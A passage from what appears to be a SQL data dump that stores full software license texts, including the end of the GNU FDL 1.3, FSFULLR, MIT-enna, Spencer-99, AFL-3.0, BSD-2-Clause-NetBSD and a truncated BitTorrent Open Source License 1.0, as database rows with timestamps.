RELICENSING\n\n\"Massive Multiauthor Collaboration Site\" (or \"MMC Site\") means any World Wide\nWeb server that publishes copyrightable works and also provides prominent\nfacilities for anybody to edit those works. A public wiki that anybody can\nedit is an example of such a server. A \"Massive Multiauthor Collaboration\"\n(or \"MMC\") contained in the site means any set of copyrightable works thus\npublished on the MMC site.\n\n\"CC-BY-SA\" means the Creative Commons Attribution-Share Alike 3.0 license\npublished by Creative Commons Corporation, a not-for-profit corporation with\na principal place of business in San Francisco, California, as well as future\ncopyleft versions of that license published by that same organization.\n\n\"Incorporate\" means to publish or republish a Document, in whole or in part,\nas part of another Document.\n\nAn MMC is \"eligible for relicensing\" if it is licensed under this License,\nand if all works that were first published under this License somewhere other\nthan this MMC, and subsequently incorporated in whole or in part into the\nMMC, (1) had no cover texts or invariant sections, and (2) were thus incorporated\nprior to November 1, 2008.\n\nThe operator of an MMC Site may republish an MMC contained in the site under\nCC-BY-SA on the same site at any time before August 1, 2009, provided the\nMMC is eligible for relicensing. ADDENDUM: How to use this License for your\ndocuments\n\nTo use this License in a document you have written, include a copy of the\nLicense in the document and put the following copyright and license notices\njust after the title page:\n\nCopyright (c) YEAR YOUR NAME . Permission is granted to copy, distribute and/or\nmodify this document under the terms of the GNU Free Documentation License,\nVersion 1.3 or any later version published by the Free Software Foundation;\nwith no Invariant Sections , no Front-Cover Texts , and no Back-Cover Texts\n. A copy of the license is included in the section entitled \"GNU Free Documentation\nLicense\".\n\nIf you have Invariant Sections, Front-Cover Texts and Back-Cover Texts, replace\nthe \"with...Texts.\" line with this:\n\nwith the Invariant Sections being LIST THEIR TITLES, with the Front-Cover\nTexts being LIST, and with the Back-Cover Texts being LIST.\n\nIf you have Invariant Sections without Cover Texts, or some other combination\nof the three, merge those two alternatives to suit the situation.\n\nIf your document contains nontrivial examples of program code, we recommend\nreleasing these examples in parallel under your choice of free software license,\nsuch as the GNU General Public License, to permit their use in free software.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(14,'FSFULLR','Copyright 1996-2006 Free Software Foundation, Inc.\n\nThis file is free software; the Free Software Foundation gives unlimited permission\nto copy and/or distribute it, with or without modifications, as long as this\nnotice is preserved.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(15,'MIT-enna','Copyright (C) 2000 Carsten Haitzler and various contributors (see AUTHORS)\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished\nto do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies of the Software and its Copyright notices. In addition publicly\ndocumented acknowledgment must be given that this software has been used if\nno source code of this software is made available publicly. This includes\nacknowledgments in either Copyright notices, Manuals, Publicity and Marketing\ndocuments or any documentation provided with any product containing this software.\nThis License does not apply to any software that links to the libraries provided\nby this software (statically or dynamically), but only to the software provided.\n\nPlease see the COPYING.PLAIN for a plain-english explanation of this notice\nand it\'s intent.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS\nBE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\nOF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH\nTHE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(16,'Spencer-99','Copyright (c) 1998, 1999 Henry Spencer. All rights reserved.\n\nDevelopment of this software was funded, in part, by Cray Research Inc., UUNET\nCommunications Services Inc., Sun Microsystems Inc., and Scriptics Corporation,\nnone of whom are responsible for the results. The author thanks all of them.\n\nRedistribution and use in source and binary forms - with or without modification\n- are permitted for any purpose, provided that redistributions in source form\nretain this entire copyright notice and indicate the origin and nature of\nany modifications.\n\nI\'d appreciate being given credit for this package in the documentation of\nsoftware which uses it, but that is not a requirement.\n\nTHIS SOFTWARE IS PROVIDED ``AS IS\'\' AND ANY EXPRESS OR IMPLIED WARRANTIES,\nINCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND\nFITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL HENRY SPENCER\nBE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(17,'AFL-3.0','Academic Free License (\"AFL\") v. 3.0 This Academic Free License (the \"License\")\napplies to any original work of authorship (the \"Original Work\") whose owner\n(the \"Licensor\") has placed the following licensing notice adjacent to the\ncopyright notice for the Original Work:\n\nLicensed under the Academic Free License version 3.0\n\n1) Grant of Copyright License. Licensor grants You a worldwide, royalty-free,\nnon-exclusive, sublicensable license, for the duration of the copyright, to\ndo the following:\n\na) to reproduce the Original Work in copies, either alone or as part of a\ncollective work;\n\nb) to translate, adapt, alter, transform, modify, or arrange the Original\nWork, thereby creating derivative works (\"Derivative Works\") based upon the\nOriginal Work;\n\nc) to distribute or communicate copies of the Original Work and Derivative\nWorks to the public, under any license of your choice that does not contradict\nthe terms and conditions, including Licensor\'s reserved rights and remedies,\nin this Academic Free License;\n\n d) to perform the Original Work publicly; and\n\n e) to display the Original Work publicly.\n\n2) Grant of Patent License. Licensor grants You a worldwide, royalty-free,\nnon-exclusive, sublicensable license, under patent claims owned or controlled\nby the Licensor that are embodied in the Original Work as furnished by the\nLicensor, for the duration of the patents, to make, use, sell, offer for sale,\nhave made, and import the Original Work and Derivative Works.\n\n3) Grant of Source Code License. The term \"Source Code\" means the preferred\nform of the Original Work for making modifications to it and all available\ndocumentation describing how to modify the Original Work. Licensor agrees\nto provide a machine-readable copy of the Source Code of the Original Work\nalong with each copy of the Original Work that Licensor distributes. Licensor\nreserves the right to satisfy this obligation by placing a machine-readable\ncopy of the Source Code in an information repository reasonably calculated\nto permit inexpensive and convenient access by You for as long as Licensor\ncontinues to distribute the Original Work.\n\n4) Exclusions From License Grant. Neither the names of Licensor, nor the names\nof any contributors to the Original Work, nor any of their trademarks or service\nmarks, may be used to endorse or promote products derived from this Original\nWork without express prior permission of the Licensor. Except as expressly\nstated herein, nothing in this License grants any license to Licensor\'s trademarks,\ncopyrights, patents, trade secrets or any other intellectual property. No\npatent license is granted to make, use, sell, offer for sale, have made, or\nimport embodiments of any patent claims other than the licensed claims defined\nin Section 2. No license is granted to the trademarks of Licensor even if\nsuch marks are included in the Original Work. Nothing in this License shall\nbe interpreted to prohibit Licensor from licensing under terms different from\nthis License any Original Work that Licensor otherwise would have a right\nto license.\n\n5) External Deployment. The term \"External Deployment\" means the use, distribution,\nor communication of the Original Work or Derivative Works in any way such\nthat the Original Work or Derivative Works may be used by anyone other than\nYou, whether those works are distributed or communicated to those persons\nor made available as an application intended for use over a network. As an\nexpress condition for the grants of license hereunder, You must treat any\nExternal Deployment by You of the Original Work or a Derivative Work as a\ndistribution under section 1(c).\n\n6) Attribution Rights. You must retain, in the Source Code of any Derivative\nWorks that You create, all copyright, patent, or trademark notices from the\nSource Code of the Original Work, as well as any notices of licensing and\nany descriptive text identified therein as an \"Attribution Notice.\" You must\ncause the Source Code for any Derivative Works that You create to carry a\nprominent Attribution Notice reasonably calculated to inform recipients that\nYou have modified the Original Work.\n\n7) Warranty of Provenance and Disclaimer of Warranty. Licensor warrants that\nthe copyright in and to the Original Work and the patent rights granted herein\nby Licensor are owned by the Licensor or are sublicensed to You under the\nterms of this License with the permission of the contributor(s) of those copyrights\nand patent rights. Except as expressly stated in the immediately preceding\nsentence, the Original Work is provided under this License on an \"AS IS\" BASIS\nand WITHOUT WARRANTY, either express or implied, including, without limitation,\nthe warranties of non-infringement, merchantability or fitness for a particular\npurpose. THE ENTIRE RISK AS TO THE QUALITY OF THE ORIGINAL WORK IS WITH YOU.\nThis DISCLAIMER OF WARRANTY constitutes an essential part of this License.\nNo license to the Original Work is granted by this License except under this\ndisclaimer.\n\n8) Limitation of Liability. Under no circumstances and under no legal theory,\nwhether in tort (including negligence), contract, or otherwise, shall the\nLicensor be liable to anyone for any indirect, special, incidental, or consequential\ndamages of any character arising as a result of this License or the use of\nthe Original Work including, without limitation, damages for loss of goodwill,\nwork stoppage, computer failure or malfunction, or any and all other commercial\ndamages or losses. This limitation of liability shall not apply to the extent\napplicable law prohibits such limitation.\n\n9) Acceptance and Termination. If, at any time, You expressly assented to\nthis License, that assent indicates your clear and irrevocable acceptance\nof this License and all of its terms and conditions. If You distribute or\ncommunicate copies of the Original Work or a Derivative Work, You must make\na reasonable effort under the circumstances to obtain the express assent of\nrecipients to the terms of this License. This License conditions your rights\nto undertake the activities listed in Section 1, including your right to create\nDerivative Works based upon the Original Work, and doing so without honoring\nthese terms and conditions is prohibited by copyright law and international\ntreaty. Nothing in this License is intended to affect copyright exceptions\nand limitations (including \"fair use\" or \"fair dealing\"). This License shall\nterminate immediately and You may no longer exercise any of the rights granted\nto You by this License upon your failure to honor the conditions in Section\n1(c).\n\n10) Termination for Patent Action. This License shall terminate automatically\nand You may no longer exercise any of the rights granted to You by this License\nas of the date You commence an action, including a cross-claim or counterclaim,\nagainst Licensor or any licensee alleging that the Original Work infringes\na patent. This termination provision shall not apply for an action alleging\npatent infringement by combinations of the Original Work with other software\nor hardware.\n\n11) Jurisdiction, Venue and Governing Law. Any action or suit relating to\nthis License may be brought only in the courts of a jurisdiction wherein the\nLicensor resides or in which Licensor conducts its primary business, and under\nthe laws of that jurisdiction excluding its conflict-of-law provisions. The\napplication of the United Nations Convention on Contracts for the International\nSale of Goods is expressly excluded. Any use of the Original Work outside\nthe scope of this License or after its termination shall be subject to the\nrequirements and penalties of copyright or patent law in the appropriate jurisdiction.\nThis section shall survive the termination of this License.\n\n12) Attorneys\' Fees. In any action to enforce the terms of this License or\nseeking damages relating thereto, the prevailing party shall be entitled to\nrecover its costs and expenses, including, without limitation, reasonable\nattorneys\' fees and costs incurred in connection with such action, including\nany appeal of such action. This section shall survive the termination of this\nLicense.\n\n13) Miscellaneous. If any provision of this License is held to be unenforceable,\nsuch provision shall be reformed only to the extent necessary to make it enforceable.\n\n14) Definition of \"You\" in This License. \"You\" throughout this License, whether\nin upper or lower case, means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License. For legal entities,\n\"You\" includes any entity that controls, is controlled by, or is under common\ncontrol with you. For purposes of this definition, \"control\" means (i) the\npower, direct or indirect, to cause the direction or management of such entity,\nwhether by contract or otherwise, or (ii) ownership of fifty percent (50%)\nor more of the outstanding shares, or (iii) beneficial ownership of such entity.\n\n15) Right to Use. You may use the Original Work in all ways not otherwise\nrestricted or conditioned by this License or by law, and Licensor promises\nnot to interfere with or be responsible for such uses by You.\n\n16) Modification of This License. This License is Copyright © 2005 Lawrence\nRosen. Permission is granted to copy, distribute, or communicate this License\nwithout modification. Nothing in this License permits You to modify this License\nas applied to the Original Work or to Derivative Works. However, You may modify\nthe text of this License and copy, distribute or communicate your modified\nversion (the \"Modified License\") and apply it to other original works of authorship\nsubject to the following conditions: (i) You may not indicate in any way that\nyour Modified License is the \"Academic Free License\" or \"AFL\" and you may\nnot use those names in the name of your Modified License; (ii) You must replace\nthe notice specified in the first paragraph above with the notice \"Licensed\nunder <insert your license name here>\" or with a notice of your own that is\nnot confusingly similar to the notice in this License; and (iii) You may not\nclaim that your original works are open source software unless your Modified\nLicense has been approved by Open Source Initiative (OSI) and You comply with\nits license review and certification process.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(18,'BSD-2-Clause-NetBSD','Copyright (c) 2008 The NetBSD Foundation, Inc. All rights reserved.\n\nThis code is derived from software contributed to The NetBSD Foundation by \n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE NETBSD FOUNDATION, INC. AND CONTRIBUTORS\n``AS IS\'\' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED\nTO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\nPURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR CONTRIBUTORS BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(19,'BitTorrent-1.0','BitTorrent Open Source License\n\nVersion 1.0\n\nThis BitTorrent Open Source License (the \"License\") applies to the BitTorrent\nclient and related software products as well as any updates or maintenance\nreleases of that software (\"BitTorrent Products\") that are distributed by\nBitTorrent, Inc. (\"Licensor\"). Any BitTorrent Product licensed pursuant to\nthis License is a Licensed Product. Licensed Product, in its entirety, is\nprotected by U.S. copyright law. This License identifies the terms under which\nyou may use, copy, distribute or modify Licensed Product.\n\nPreamble\n\nThis Preamble is intended to describe, in plain English, the nature and scope\nof this License. However, this Preamble is not a part of this license. The\nlegal effect of this License is dependent only upon the terms of the License\nand not this Preamble.\n\nThis License complies with the Open Source Definition and is derived from\nthe Jabber Open Source License 1.0 (the \"JOSL\"), which has been approved by\nOpen Source Initiative. Sections 4(c) and 4(f)(iii) from the JOSL have been\ndropped.\n\nThis License provides that:\n\n1. You may use, sell or give away the Licensed Product, alone or as a component\nof an aggregate software distribution containing programs from several different\nsources. No royalty or other fee is required.\n\n2. Both Source Code and executable versions of the Licensed Product, including\nModifications made by previous Contributors, are available for your use. (The\nterms \"Licensed Product,\" \"Modifications,\" \"Contributors\" and \"Source Code\"\nare defined in the License.)\n\n3. You are allowed to make Modifications to the Licensed Product, and you\ncan create Derivative Works from it. (The term \"Derivative Works\" is defined\nin the License.)\n\n4. By accepting the Licensed Product under the provisions of this License,\nyou agree that any Modifications you make to the Licensed Product and then\ndistribute are governed by the provisions of this License. In particular,\nyou must make the Source Code of your Modifications available to others.\n\n5. You may use the Licensed Product for any purpose, but the Licensor is not\nproviding you any warranty whatsoever, nor is the Licensor accepting any liability\nin the event that the Licensed Product doesn\'t work properly or causes you\nany injury or damages.\n\n6. If you sublicense the Licensed Product or Derivative Works, you may charge\nfees for warranty or support, or for accepting indemnity or liability obligations\nto your customers. You cannot charge for the Source Code.\n\n7. If you assert any patent claims against the Licensor relating to the Licensed\nProduct, or if you breach any terms of the License, your rights to the Licensed\nProduct under this License automatically terminate.\n\nYou may use this License to distribute your own Derivative Works, in which\ncase the provisions of this License will apply to your Derivative Works just\nas they do to the original Licensed Product.\n\nAlternatively, you may distribute your Derivative Works under any other OSI-approved\nOpen Source license, or under a proprietary license of your choice. If you\nuse any license other than this License, however, you must continue to fulfill\nthe requirements of this License (including the provisions relating to publishing\nthe Source Code) for those portions of your Derivative Works that consist\nof the Licensed Product, including the files containing Modifications.\n\nNew versions of this License may be published from time to time. You may choose\nto continue to use the license terms in this version of the License or those\nfrom the new version. However, only the Licensor has the right to change the\nLicense terms as they apply to the Licensed Product.\n\nThis License relies on precise definitions for certain terms. Those terms\nare defined when they are first used, and the definitions are repeated for\nyour convenience in a Glossary at the end of the License.\n\nLicense Terms\n\n1. Grant of License From Licensor. Licensor hereby grants you a world-wide,\nroyalty-free, non-exclusive license, subject to third party intellectual property\nclaims, to do the following:\n\na. Use, reproduce, modify, display, perform, sublicense and distribute any\nModifications created by such Contributor or portions thereof, in both Source\nCode or as an executable program, either on an unmodified basis or as part\nof Derivative Works.\n\nb. Under claims of patents now or hereafter owned or controlled by Contributor,\nto make, use, sell, offer for sale, have made, and/or otherwise dispose of\nModifications or portions thereof, but solely to the extent that any such\nclaim is necessary to enable you to make, use, sell, offer for sale, have\nmade, and/or otherwise dispose of Modifications or portions thereof or Derivative\nWorks thereof.\n\n2. Grant of License to Modifications From Contributor. \"Modifications\" means\nany additions to or deletions from the substance or structure of (i) a file\ncontaining Licensed Product, or (ii) any new file that contains any part of\nLicensed Product. Hereinafter in this License, the term \"Licensed Product\"\nshall include all previous Modifications that you receive from any Contributor.\nBy application of the provisions in Section 4(a) below, each person or entity\nwho created or contributed to the creation of, and distributed, a Modification\n(a \"Contributor\") hereby grants you a world-wide, royalty-free, non-exclusive\nlicense, subject to third party intellectual property claims, to do the following:\n\na. Use, reproduce, modify, display, perform, sublicense and distribute any\nModifications created by such Contributor or portions thereof, in both Source\nCode or as an executable program, either on an unmodified basis or as part\nof Derivative Works.\n\nb. Under claims of patents now or hereafter owned or controlled by Contributor,\nto make, use, sell, offer for sale, have made, and/or otherwise dispose of\nModifications or portions thereof, but solely to the extent that any such\nclaim is necessary to enable you to make, use, sell, offer for sale, have\nmade, and/or otherwise dispose of Modifications or portions thereof or Derivative\nWorks thereof.\n\n3. Exclusions From License Grant. Nothing in this License shall be deemed\nto grant any rights to trademarks, copyrights, patents, trade secrets or any\nother intellectual property of Licensor or any Contributor except as expressly\nstated herein. No patent license is granted separate from the Licensed Product,\nfor code that you delete from the Licensed Product, or for combinations of\nthe Licensed Product with other software or hardware. No right is granted\nto the trademarks of Licensor or any Contributor even if such marks are included\nin the Licensed Product. Nothing in this License shall be interpreted to prohibit\nLicensor from licensing under different terms from this License any code that\nLicensor otherwise would have a right to license.\n\n 4. Your Obligations Regarding Distribution.\n\na. Application of This License to Your Modifications. As an express condition\nfor your use of the Licensed Product, you hereby agree that any Modifications\nthat you create or to which you contribute, and which you distribute, are\ngoverned by the terms of this License including, without limitation, Section\n2. Any Modifications that you create or to which you contribute may be distributed\nonly under the terms of this License or a future version of this License released\nunder Section 7. You must include a copy of this License with every copy of\nthe Modifications you distribute. You agree not to offer or impose any terms\non any Source Code or executable version of the Licensed Product or Modifications\nthat alter or restrict the applicable version of this License or the recipients\'\nrights hereunder. However, you may include an additional document offering\nthe additional rights described in Section 4(d).\n\nb. Availability of Source Code. You must make available, under the terms of\nthis License, the Source Code of the Licensed Product and any Modifications\nthat you distribute, either on the same media as you distribute any executable\nor other form of the Licensed Product, or via a mechanism generally accepted\nin the software development community for the electronic transfer of data\n(an \"Electronic Distribution Mechanism\"). The Source Code for any version\nof Licensed Product or Modifications that you distribute must remain available\nfor at least twelve (12) months after the date it initially became available,\nor at least six (6) months after a subsequent version of said Licensed Product\nor Modifications has been made available. You are responsible for ensuring\nthat the Source Code version remains available even if the Electronic Distribution\nMechanism is maintained by a third party.\n\n c. Intellectual Property Matters.\n\ni. Third Party Claims. If you have knowledge that a license to a third party\'s\nintellectual property right is required to exercise the rights granted by\nthis License, you must include a text file with the Source Code distribution\ntitled \"LEGAL\" that describes the claim and the party making the claim in\nsufficient detail that a recipient will know whom to contact. If you obtain\nsuch knowledge after you make any Modifications available as described in\nSection 4(b), you shall promptly modify the LEGAL file in all copies you make\navailable thereafter and shall take other steps (such as notifying appropriate\nmailing lists or newsgroups) reasonably calculated to inform those who received\nthe Licensed Product from you that new knowledge has been obtained.\n\nii. Contributor APIs. If your Modifications include an application programming\ninterface (\"API\") and you have knowledge of patent licenses that are reasonably\nnecessary to implement that API, you must also include this information in\nthe LEGAL file.\n\niii. Representations. You represent that, except as disclosed pursuant to\n4(c)(i) above, you believe that any Modifications you distribute are your\noriginal creations and that you have sufficient rights to grant the rights\nconveyed by this License.\n\nd. Required Notices. You must duplicate this License in any documentation\nyou provide along with the Source Code of any Modifications you create or\nto which you contribute, and which you distribute, wherever you describe recipients\'\nrights relating to Licensed Product. You must duplicate the notice contained\nin Exhibit A (the \"Notice\") in each file of the Source Code of any copy you\ndistribute of the Licensed Product. If you created a Modification, you may\nadd your name as a Contributor to the Notice. If it is not possible to put\nthe Notice in a particular Source Code file due to its structure, then you\nmust include such Notice in a location (such as a relevant directory file)\nwhere a user would be likely to look for such a notice. You may choose to\noffer, and charge a fee for, warranty, support, indemnity or liability obligations\nto one or more recipients of Licensed Product. However, you may do so only\non your own behalf, and not on behalf of the Licensor or any Contributor.\nYou must make it clear that any such warranty, support, indemnity or liability\nobligation is offered by you alone, and you hereby agree to indemnify the\nLicensor and every Contributor for any liability incurred by the Licensor\nor such Contributor as a result of warranty, support, indemnity or liability\nterms you offer.\n\ne. Distribution of Executable Versions. You may distribute Licensed Product\nas an executable program under a license of your choice that may contain terms\ndifferent from this License provided (i) you have satisfied the requirements\nof Sections 4(a) through 4(d) for that distribution, (ii) you include a conspicuous\nnotice in the executable version, related documentation and collateral materials\nstating that the Source Code version of the Licensed Product is available\nunder the terms of this License, including a description of how and where\nyou have fulfilled the obligations of Section 4(b), and (iii) you make it\nclear that any terms that differ from this License are offered by you alone,\nnot by Licensor or any Contributor. You hereby agree to indemnify the Licensor\nand every Contributor for any liability incurred by Licensor or such Contributor\nas a result of any terms you offer.\n\nf. Distribution of Derivative Works. You may create Derivative Works (e.g.,\ncombinations of some or all of the Licensed Product with other code) and distribute\nthe Derivative Works as products under any other license you select, with\nthe proviso that the requirements of this License are fulfilled for those\nportions of the Derivative Works that consist of the Licensed Product or any\nModifications thereto.\n\n5. Inability to Comply Due to Statute or Regulation. If it is impossible for\nyou to comply with any of the terms of this License with respect to some or\nall of the Licensed Product due to statute, judicial order, or regulation,\nthen you must (i) comply with the terms of this License to the maximum extent\npossible, (ii) cite the statute or regulation that prohibits you from adhering\nto the License, and (iii) describe the limitations and the code they affect.\nSuch description must be included in the LEGAL file described in Section 4(d),\nand must be included with all distributions of the Source Code. Except to\nthe extent prohibited by statute or regulation, such description must be sufficiently\ndetailed for a recipient of ordinary skill at computer programming to be able\nto understand it.\n\n6. Application of This License. This License applies to code to which Licensor\nor Contributor has attached the Notice in Exhibit A, which is incorporated\nherein by this reference.\n\n 7. Versions of This License.\n\na. New Versions. Licensor may publish from time to time revised and/or new\nversions of the License.\n\nb. Effect of New Versions. Once Licensed Product has been published under\na particular version of the License, you may always continue to use it under\nthe terms of that version. You may also choose to use such Licensed Product\nunder the terms of any subsequent version of the License published by Licensor.\nNo one other than Licensor has the right to modify the terms applicable to\nLicensed Product created under this License.\n\nc. Derivative Works of this License. If you create or use a modified version\nof this License, which you may do only in order to apply it to software that\nis not already a Licensed Product under this License, you must rename your\nlicense so that it is not confusingly similar to this License, and must make\nit clear that your license contains terms that differ from this License. In\nso naming your license, you may not use any trademark of Licensor or any Contributor.\n\n8. Disclaimer of Warranty. LICENSED PRODUCT IS PROVIDED UNDER THIS LICENSE\nON AN AS IS BASIS, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED,\nINCLUDING, WITHOUT LIMITATION, WARRANTIES THAT THE LICENSED PRODUCT IS FREE\nOF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR PURPOSE OR NON-INFRINGING.\nTHE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE LICENSED PRODUCT\nIS WITH YOU. SHOULD LICENSED PRODUCT PROVE DEFECTIVE IN ANY RESPECT, YOU (AND\nNOT THE LICENSOR OR ANY OTHER CONTRIBUTOR) ASSUME THE COST OF ANY NECESSARY\nSERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN\nESSENTIAL PART OF THIS LICENSE. NO USE OF LICENSED PRODUCT IS AUTHORIZED HEREUNDER\nEXCEPT UNDER THIS DISCLAIMER.\n\n 9. Termination.\n\na. Automatic Termination Upon Breach. This license and the rights granted\nhereunder will terminate automatically if you fail to comply with the terms\nherein and fail to cure such breach within thirty (30) days of becoming aware\nof the breach. All sublicenses to the Licensed Product that are properly granted\nshall survive any termination of this license. Provisions that, by their nature,\nmust remain in effect beyond the termination of this License, shall survive.\n\nb. Termination Upon Assertion of Patent Infringement. If you initiate litigation\nby asserting a patent infringement claim (excluding declaratory judgment actions)\nagainst Licensor or a Contributor (Licensor or Contributor against whom you\nfile such an action is referred to herein as Respondent) alleging that Licensed\nProduct directly or indirectly infringes any patent, then any and all rights\ngranted by such Respondent to you under Sections 1 or 2 of this License shall\nterminate prospectively upon sixty (60) days notice from Respondent (the \"Notice\nPeriod\") unless within that Notice Period you either agree in writing (i)\nto pay Respondent a mutually agreeable reasonably royalty for your past or\nfuture use of Licensed Product made by such Respondent, or (ii) withdraw your\nlitigation claim with respect to Licensed Product against such Respondent.\nIf within said Notice Period a reasonable royalty and payment arrangement\nare not mutually agreed upon in writing by the parties or the litigation claim\nis not withdrawn, the rights granted by Licensor to you under Sections 1 and\n2 automatically terminate at the expiration of said Notice Period.\n\nc. Reasonable Value of This License. If you assert a patent infringement claim\nagainst Respondent alleging that Licensed Product directly or indirectly infringes\nany patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by said Respondent under Sections 1 and 2 shall\nbe taken into account in determining the amount or value of any payment or\nlicense.\n\nd. No Retroactive Effect of Termination. In the event of termination under\nSections 9(a) or 9(b) above, all end user license agreements (excluding licenses\nto distributors and resellers) that have been validly granted by you or any\ndistributor hereunder prior to termination shall survive termination.\n\n10. Limitation of Liability. UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY,\nWHETHER TORT (INCLUDING NEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL THE LICENSOR,\nANY CONTRIBUTOR, OR ANY DISTRIBUTOR OF LICENSED PRODUCT, OR ANY SUPPLIER OF\nANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL,\nOR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES\nFOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY\nAND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL HAVE\nBEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY\nSHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY\n\nRESULTING FROM SUCH PARTYS NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS\nSUCH LIMITATION. SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION\nOF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION MAY\nNOT APPLY TO YOU.\n\n11. Responsibility for Claims. As between Licensor and Contributors, each\nparty is responsible for claims and damages arising, directly or indirectly,\nout of its utilization of rights under this License. You agree to work with\nLicensor and Contributors to distribute such responsibility on an equitable\nbasis. Nothing herein is intended or\n\n shall be deemed to constitute any admission of liability.\n\n12. U.S. Government End Users. The Licensed Product is a commercial item,\nas that term is defined in 48 C.F.R. 2.101 (Oct. 1995), consisting of commercial\ncomputer software and commercial computer software documentation, as such\nterms are used in 48 C.F.R. 12.212 (Sept. 1995). Consistent with 48 C.F.R.\n12.212 and 48 C.F.R. 227.7202-1 through 227.7202-4 (June 1995), all U.S. Government\nEnd Users acquire Licensed Product with only those rights set forth herein.\n\n13. Miscellaneous. This License represents the complete agreement concerning\nthe subject matter hereof. If any provision of this License is held to be\nunenforceable, such provision shall be reformed only to the extent necessary\nto make it enforceable. This License shall be governed by California law provisions\n(except to the extent applicable law, if any, provides otherwise), excluding\nits conflict-of-law provisions. You expressly agree that any litigation relating\nto this license shall be subject to the jurisdiction of the Federal Courts\nof the Northern District of California or the Superior Court of the County\nof Santa Clara, California (as appropriate), with venue lying in Santa Clara\nCounty, California, with the losing party responsible for costs including,\nwithout limitation, court costs and reasonable attorneys fees and expenses.\nThe application of the United Nations Convention on Contracts for the International\nSale of Goods is expressly excluded. You and Licensor expressly waive any\nrights to a jury trial in any litigation concerning Licensed Product or this\nLicense. Any law or regulation that provides that the language of a contract\nshall be construed against the drafter shall not apply to this License.\n\n14. Definition of You in This License. You throughout this License, whether\nin upper or lower case, means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License or a future version\nof this License issued under Section 7. For legal entities, you includes any\nentity that controls, is controlled by, or is under common control with you.\nFor purposes of this definition, control means (i) the power, direct or indirect,\nto cause the direction or management of such entity, whether by contract or\notherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding\nshares, or (iii) beneficial ownership of such entity.\n\n15. Glossary. All defined terms in this License that are used in more than\none Section of this License are repeated here, in 